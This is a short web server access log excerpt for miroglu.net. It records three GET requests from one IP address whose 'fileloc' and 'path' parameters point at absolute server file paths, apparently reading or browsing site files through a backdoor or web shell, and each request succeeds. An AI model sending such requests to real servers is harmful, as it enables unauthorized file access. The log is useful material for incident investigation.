209.50.180.2 - - [26/Apr/2026:09:17:31 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/goods.php&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 6295 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:32 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/index.php0&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 14475 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
209.50.180.2 - - [26/Apr/2026:09:17:33 +0300] "GET /?fileloc=/var/www/vhosts/miroglu.net/httpdocs/googleaa60eb9ae1b0bd93.html&path=/var/www/vhosts/miroglu.net/httpdocs HTTP/1.1" 200 5470 "https://miroglu.net/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 YaBrowser/22.7.0 Yowser/2.5 Safari/537.36"
